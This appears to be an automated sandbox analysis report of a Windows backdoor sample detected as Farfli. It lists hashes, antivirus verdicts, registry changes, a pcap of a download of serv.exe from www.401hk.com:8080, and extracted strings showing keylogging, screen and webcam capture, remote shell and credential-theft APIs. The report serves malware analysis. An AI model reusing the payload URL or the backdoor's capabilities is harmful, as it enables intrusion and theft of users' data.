Analysis Date2014-08-15 19:11:22
MD50b88ec6eec7ae686a1e027fc93417d0a
SHA1d1fb895153e948eca701a4855b9709aea533e14e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 06655b24c8ee9c503248875747c215d5 sha1: 59f3b7509289c2e9daf7fe75038f38efa75b5c59 size: 176128
Section.rdata md5: 4a05fff5eab94f1475b30fba4f4ceb25 sha1: fd0baace43b4231712bf364cf038abbaa497d116 size: 16384
Section.data md5: b29e787d6dab4fd75b325ffba6a34f64 sha1: 3badba97ea1ad53e9fb694bc202a0c94fec81ddc size: 12288
Section.rsrc md5: 4072783b8efb99a9e5817067d68f61c6 sha1: 7cb41fea50720b48be0c145e1473982b23e9ab77 size: 12288
Timestamp2013-11-20 08:18:15
PackerMicrosoft Visual C++ v6.0
PEhash63a8fef9d46d038749fcd1d24fb70cf7fabdc2c4
IMPhashf334a129cb0600a15d4c03c856cda98d
AV360 SafeGen:Variant.Symmi.40534
AVAd-AwareGen:Variant.Symmi.40534
AVAlwil (avast)Farfli-BD [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Heuristic-217!Eldorado
AVAvira (antivir)TR/Graftor.123644.13
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Backdoor.Farfli.BX4
AVClamAVno_virus
AVDr. WebTrojan.KeyLogger.22750
AVEmsisoftGen:Variant.Symmi.40534
AVEset (nod32)Win32/Farfli.APS
AVFortinetW32/Vehidis.U!tr
AVFrisk (f-prot)W32/Heuristic-217!Eldorado (not disinfectable)
AVF-SecureGen:Variant.Symmi.40534
AVGrisoft (avg)BackDoor.Generic_r.EPC
AVIkarusTrojan-GameThief.Win32.Magania
AVK7Trojan ( 0048bc811 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeno_virus
AVMicrosoft Security EssentialsBackdoor:Win32/Farfli.BX
AVMicroWorld (escan)Gen:Variant.Symmi.40534
AVNormanwinpe/DLoader.ATLZA
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus
AVYara APTno_virus
AVZillya!Trojan.Farfli.Win32.16366

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSwww.401hk.com
Winsock URLhttp://www.401hk.com:8080/serv.exe

Network Details:

DNSwww.401hk.com
Type: A
222.216.190.60
DNSwww.401hk.com
Type: A
117.34.28.75
HTTP GEThttp://www.401hk.com:8080/serv.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 222.216.190.60:8080

Raw Pcap
0x00000000 (00000)   47455420 2f736572 762e6578 65204854   GET /serv.exe HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000030 (00048)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000040 (00064)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000060 (00096)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000070 (00112)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000080 (00128)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000090 (00144)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000a0 (00160)   73743a20 7777772e 34303168 6b2e636f   st: www.401hk.co
0x000000b0 (00176)   6d3a3830 38300d0a 436f6e6e 65637469   m:8080..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a                                  ..


Strings
kernel32.dll
LeaveCriticalSection
KERNEL32.dll
LeaveCriticalSection
KERNEL32.dll
KERNEL32.dll
GetWindowsDirectoryA
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
Microsoft\Network\Connections\pbk\rasphone.pbk
Documents and Settings\
wsprintfA
USER32.dll
KERNEL32.dll
FreeLibrary
advapi32.dll
ConvertSidToStringSidA
RasDialParams!%s#0
L$_RasDefaultCredentials#0
LsaFreeMemory
ADVAPI32.dll
wsprintfA
USER32.dll
KERNEL32.dll
GetWindowsDirectoryA
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
Microsoft\Network\Connections\pbk\rasphone.pbk
Documents and Settings\
wsprintfA
USER32.dll
KERNEL32.dll
GetPrivateProfileStringA
KERNEL32.dll
DeleteFileA
lstrlenA
KERNEL32.dll
GetFileAttributesA
KERNEL32.dll
KERNEL32.dll
GetLastError
\
ADVAPI32.dll
RegOpenKeyExA
USER32.dll
wsprintfA
WinSta0\Default
KERNEL32.dll
CreateProcessA
gKERNEL32.dll
GetLogicalDriveStringsA
KERNEL32.dll
GetVolumeInformationA
KERNEL32.dll
lstrlenA
KERNEL32.dll
GetDiskFreeSpaceExA
KERNEL32.dll
lstrlenA
KERNEL32.dll
LocalAlloc
KERNEL32.dll
LocalReAlloc
KERNEL32.dll
FindNextFileA
%s\*.*
USER32.dll
wsprintfA
KERNEL32.dll
FindFirstFileA
hh
FindClose
kernel32.dll
FindNextFileA
kernel32.dll
%s\*.*
USER32.dll
wsprintfA
KERNEL32.dll
FindFirstFileA
KERNEL32.dll
DeleteFileA
FindClose
kernel32.dll
KERNEL32.dll
lstrlenA
KERNEL32.dll
LocalAlloc
KERNEL32.dll
CreateFileA
KERNEL32.dll
GetFileSize
iLocalAlloc
KERNEL32.dll
CreateFileA
KERNEL32.dll
KERNEL32.dll
SetFilePointer
jKERNEL32.dll
ReadFile
KERNEL32.dll
lstrlenA
lstrlenA
KERNEL32.dll
FindNextFileA
wsprintfA
USER32.dll
USER32.dll
FindFirstFileA
KERNEL32.dll
FindClose
KERNEL32.dll
FindFirstFileA
FindClose
KERNEL32.dll
KERNEL32.dll
FindFirstFileA
pFindClose
KERNEL32.dll
KERNEL32.dll
CreateFileA
KERNEL32.dll
CreateFileA
KERNEL32.dll
SetFilePointer
plstrlenA
KERNEL32.dll
wsprintfA
USER32.dll
SYSTEM\CurrentControlSet\Services\
GetModuleFileNameA
CreateFileA
SetFilePointer
GetLastError
SYSTEM\CurrentControlSet\Services\
SYSTEM\CurrentControlSet\Services\
KERNEL32.dll
lstrlenA
CreateProcessA
KERNEL32.dll
WinSta0
KERNEL32.dll
CreateProcessA
WinSta0
DJX UP
CreateProcessA
lstrcpyA
lstrlenA
KERNEL32.dll
KERNEL32.dll
KERNEL32.dll
aPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMAND
WinSta0
KERNEL32.dll
lstrlenA
SYSTEM\CurrentControlSet\Services\BITS
SYSTEM\CurrentControlSet\Services\
-0KERNEL32.dll
LeaveCriticalSection
KERNEL32.dll
EnterCriticalSection
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
CreateThread
WS2_32.dll
recv
.
WS2_32.dll
recv
WS2_32.dll
recv
KERNEL32.dll
LeaveCriticalSection
KERNEL32.dll
EnterCriticalSection
KERNEL32.dll
CreateThread
KERNEL32.dll
WaitForSingleObject
[ZKERNEL32.dll
CreateThread
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
CreateThread
KERNEL32.dll
CloseHandle
KERNEL32.dll
InitializeCriticalSection
KERNEL32.dll
DeleteCriticalSection
WS2_32.dll
recv
select
KERNEL32.dll
KERNEL32.dll
TerminateThread
KERNEL32.dll
InterlockedExchange
KERNEL32.dll
USER32.dll
wsprintfA
GetWindowsDirectoryA
KERNEL32.dll
DeleteFileA
KERNEL32.dll
GetModuleFileNameA
KERNEL32.dll
lstrlenA
KERNEL32.dll
GetFileSize
\ourlog.dat
KERNEL32.dll
GetSystemDirectoryA
KERNEL32.dll
CreateFileA
KERNEL32.dll
SetFilePointer
lstrlenA
KERNEL32.dll
USER32.dll
wsprintfA
KERNEL32.dll
lstrlenA
\ourlog.dat
{
|\ourlog.dat
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
SetEvent
ADVAPI32.dll
RegOpenKeyExA
REG_SZ
%-24s %-15s %s 
n
ADVAPI32.dll
RegOpenKeyExA
USER32.dll
wsprintfA
ADVAPI32.dll
RegOpenKeyExA
USER32.dll
MapVirtualKeyA
USER32.dll
mouse_event
USER32.dll
keybd_event
GlobalLock
KERNEL32.dll
KERNEL32.dll
GlobalAlloc
KERNEL32.dll
GlobalUnlock
USER32.dll
GetClipboardData
KERNEL32.dll
GlobalUnlock
KERNEL32.dll
GlobalSize
KERNEL32.dll
GlobalLock
v
KERNEL32.dll
InterlockedExchange
KERNEL32.dll
CloseHandle
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
CloseHandle
KERNEL32.dll
WaitForSingleObject
USER32.dll
BlockInput
KERNEL32.dll
VirtualAlloc
sKERNEL32.dll
VirtualFree
tuKERNEL32.dll
Sleep
USER32.dll
BlockInput
USER32.dll
SendMessageA
USER32.dll
SystemParametersInfoA
DestroyCursor
KERNEL32.dll
InterlockedExchange
USER32.dll
GetDC
KERNEL32.dll
InterlockedExchange
USER32.dll
GetDesktopWindow
USER32.dll
GetDC
KERNEL32.dll
Sleep
KERNEL32.dll
GetTickCount
USER32.dll
GetDesktopWindow
USER32.dll
GetDC
CreateCompatibleDC
KERNEL32.dll
Sleep
KERNEL32.dll
GetTickCount
KERNEL32.dll
InterlockedExchange
GetCursorInfo
DestroyCursor
KERNEL32.dll
CreatePipe
KERNEL32.dll
GetStartupInfoA
KERNEL32.dll
GetSystemDirectoryA
\cmd.exe
KERNEL32.dll
CreateProcessA
.KERNEL32.dll
TerminateThread
TerminateProcess
KERNEL32.dll
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
DisconnectNamedPipe
KERNEL32.dll
LocalAlloc
KERNEL32.dll
Sleep
KERNEL32.dll
PeekNamedPipe
KERNEL32.dll
ReadFile
KERNEL32.dll
TerminateThread
KERNEL32.dll
TerminateProcess
KERNEL32.dll
WaitForMultipleObjects
CloseHandle
KERNEL32.dll
GetLastError
Kernel32.dll
WTSGetActiveConsoleSessionId
KERNEL32.dll
lstrlenA
KERNEL32.dll
lstrlenA
WININET.dll
InternetCloseHandle
InternetOpenA
InternetReadFile
InternetOpenUrlA
Mozilla/4.0 (compatible)
HARDWARE\DESCRIPTION\System\CentralProcessor\0
AVICAP32.dll
capGetDriverDescriptionA
KERNEL32.dll
lstrcpyA
lstrlenA
KERNEL32.dll
USER32.dll
wsprintfA
f
KERNEL32.dll
GetSystemInfo
SYSTEM\CurrentControlSet\Services\BITS
KERNEL32.dll
ReleaseMutex
GetProcessWindowStation
USER32.dll
WaitForSingleObject
GetLastError
OpenEventA
SetErrorMode
CreateMutexA
USER32.dll
OpenWindowStationA
SetProcessWindowStation
USER32.dll
GetTickCount
KERNEL32.dll
http://www.401hk.com:8080/serv.exe
KERNEL32.dll
killmdx
\\.\killmdx
CreateThread
OutputDebugStringA
KERNEL32.dll
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
LocalSize
KERNEL32.dll
LocalSize
lstrlenA
KERNEL32.dll
KERNEL32.dll
LocalAlloc
KERNEL32.dll
LocalSize
.KERNEL32.dll
Sleep
KERNEL32.dll
TerminateProcess
KERNEL32.dll
OpenProcess
KERNEL32.dll
LocalAlloc
lstrlenA
KERNEL32.dll
KERNEL32.dll
LocalReAlloc
KERNEL32.dll
LocalSize
KERNEL32.dll
CreateToolhelp32Snapshot
KERNEL32.dll
Process32Next
}KERNEL32.dll
Process32First
KERNEL32.dll
OpenProcess
PSAPI.DLL
GetModuleFileNameExA
KERNEL32.dll
GetCurrentProcess
KERNEL32.dll
GetLastError
USER32.dll
ExitWindowsEx
KERNEL32.dll
LocalAlloc
lstrlenA
KERNEL32.dll
KERNEL32.dll
LocalReAlloc
KERNEL32.dll
LocalSize
USER32.dll
GetWindowThreadProcessId
USER32.dll
EnumWindows
~KERNEL32.dll
Process32First
KERNEL32.dll
CreateToolhelp32Snapshot
KERNEL32.dll
GetLastError
KERNEL32.dll
Process32Next
KERNEL32.dll
SetEvent
KERNEL32.dll
WaitForSingleObject
CreateEventA
KERNEL32.dll
CloseHandle
KERNEL32.dll
KERNEL32.dll
Process32Next
KERNEL32.dll
CreateToolhelp32Snapshot
KERNEL32.dll
Process32First
KERNEL32.dll
lstrcmpiA
KERNEL32.dll
lstrcmpiA
WTSAPI32.dll
WTSAPI32.dll
WTSFreeMemory
WTSQuerySessionInformationA
explorer.exe
KERNEL32.dll
OpenProcess
USER32.dll
GetUserObjectInformationA
GetThreadDesktop
USER32.dll
KERNEL32.dll
GetCurrentThreadId
USER32.dll
OpenInputDesktop
KERNEL32.dll
lstrcmpiA
USER32.dll
SetThreadDesktop
GetThreadDesktop
USER32.dll
GetCurrentThreadId
KERNEL32.dll
USER32.dll
GetUserObjectInformationA
USER32.dll
SetThreadDesktop
USER32.dll
OpenInputDesktop
USER32.dll
GetThreadDesktop
KERNEL32.dll
GetCurrentThreadId
Winlogon
lstrlenA
KERNEL32.dll
WININET.dll
InternetCloseHandle
InternetOpenA
InternetReadFile
InternetOpenUrlA
mozi
lla/4.0 (compatible)
KERNEL32.dll
CreateFileA
KERNEL32.dll
CreateEventA
avicap32.dll
capCreateCaptureWindowA
#32770
CVideoCap
KERNEL32.dll
SetEvent
avicap32.dll
capGetDriverDescriptionA
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
InterlockedExchange
WaitForSingleObject
KERNEL32.dll
InterlockedExchange
wxKERNEL32.dll
InterlockedExchange
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
GetTickCount
KERNEL32.dll
Sleep
ICSeqCompressFrame
ICOpen
ICSendMessage
ICSeqCompressFrameStart
ICCompressorFree
ICClose
.
jjjj
jjjjjjjjh
								
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
??1type_info@@UAE@XZ
??2@YAPAXI@Z
??3@YAXPAX@Z
{4_^]3
~(9~$u
A<;B(}
A@;B,}
_acmdln
AddAccessAllowedAce
_adjust_fdiv
AdjustTokenPrivileges
advapi32.dll
ADVAPI32.dll
AllocateAndInitializeSid
Backspace
bad Allocate
bad buffer
_beginthreadex
BitBlt
calloc
CancelIo
CharNextA
CloseClipboard
CloseDesktop
CloseHandle
CloseServiceHandle
CloseWindow
_controlfp
ControlService
CreateCompatibleBitmap
CreateDIBSection
CreateDirectoryA
CreateEnvironmentBlock
CreateEventA
CreateFileA
CreateProcessAsUserA
CreateRemoteThread
CreateWindowExA
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
__CxxFrameHandler
_CxxThrowException
D$0Qh,
D$(8D*
@.data
DefineDosDeviceA
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly 
Delete
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
Device
DialParamsUID
DownArrow
;D$<s!
D$$SUV
DuplicateTokenEx
EmptyClipboard
EnterCriticalSection
EnumProcessModules
_errno
_except_handler3
Execute
ExitProcess
Fdf+Fh
fdRead
FreeLibrary
FreeSid
FuKKi\Default
Game Over
GDI32.dll
GetAsyncKeyState
GetCurrentProcess
GetCursorPos
GetDIBits
GetDriveTypeA
GetFileSize
GetForegroundWindow
GetKeyState
GetLengthSid
GetLocalTime
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetNamedSecurityInfoA
GetPrivateProfileSectionNamesA
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetSystemDirectoryA
GetSystemMetrics
GetTokenInformation
GetVersionExA
GetWindowTextA
GetWindowThreadProcessId
GlobalFree
<H1>403 Forbidden</H1>
HeapAlloc
HeapFree
HMLWQTn\Default
|$HPWS
HTTP://
HTTP/1.0 555 OK
Http/1.1 405 Forbidden
ICSendMessage
ICSeqCompressFrameEnd
 inflate 1.1.4 Copyright 1995-2002 Mark Adler 
InitializeAcl
InitializeCriticalSection
InitializeSecurityDescriptor
_initterm
Insert
InterlockedExchange
IsValidSid
IsWindow
IsWindowVisible
KERNEL32
kernel32.dll
KERNEL32.dll
LeaveCriticalSection
LeftArrow
L$LQVS
LoadCursorA
LoadLibraryA
LocalAlloc
LocalFree
LookupAccountNameA
LookupAccountSidA
LookupPrivilegeValueA
L$,QWV
L$ RUPj
LsaClose
LsaOpenPolicy
LsaRetrievePrivateData
lstrcatA
lstrcmpA
lstrcpyA
lstrlenA
malloc
memcpy
memmove
memset
MoveFileExA
MSVCP60.dll
MSVCRT.dll
MSVFW32.dll
MultiByteToWideChar
Num Lock
OpenClipboard
OpenDesktopA
OpenEventA
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenServiceA
PageDown
PageUp
__p__commode
__p__fmode
PhoneNumber
PostMessageA
PSAPI.DLL
QueryServiceStatus
`.rdata
ReadFile
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegSetKeySecurity
RegSetValueExA
ReleaseDC
RemoveDirectoryA
rename
ResetEvent
Rhvidc
RightArrow
Scroll
%s:\Documents and Settings\Local User
SeDebugPrivilege
select
Select
SelectObject
SendMessageA
__set_app_type
SetCapture
SetClipboardData
SetCursorPos
SetEntriesInAclA
SetEvent
SetFileAttributesA
SetLastError
SetNamedSecurityInfoA
SetRect
SetSecurityDescriptorDacl
SetTokenInformation
__setusermatherr
SHDeleteKeyA
SHELL32.dll
ShellExecuteA
SHGetFileInfoA
SHGetSpecialFolderPathA
shlwapi.dll
SHLWAPI.dll
Snapshot
%s%s*.*
%s\SHELL\OPEN\COMMAND
%s%s%s
StartServiceA
strcat
strchr
strcmp
strcpy
strlen
strncat
strncmp
_strnicmp
strrchr
strstr
strtok
_strupr
SVWht*C
T+3x%A
T$DPVS
t$h78B
t$hC8B
!This program cannot be run in DOS mode.
T$LPQR
T$LRWS
T$,PQh8
T$(PQR
T$,RWV
tZ9H tU9H$tP
UpArrow
URLDownloadToFileA
urlmon.dll
USER32.dll
USERENV.dll
VirtualAlloc
VirtualAllocEx
VirtualFree
W(9W$u
WaitForSingleObject
WideCharToMultiByte
WindowFromPoint
WriteFile
WriteProcessMemory
WS2_32.dll
WSAIoctl
wsprintfA
WTSAPI32.dll
WTSFreeMemory
WTSQuerySessionInformationA
WTSQueryUserToken
|$ WUSV
_XcptFilter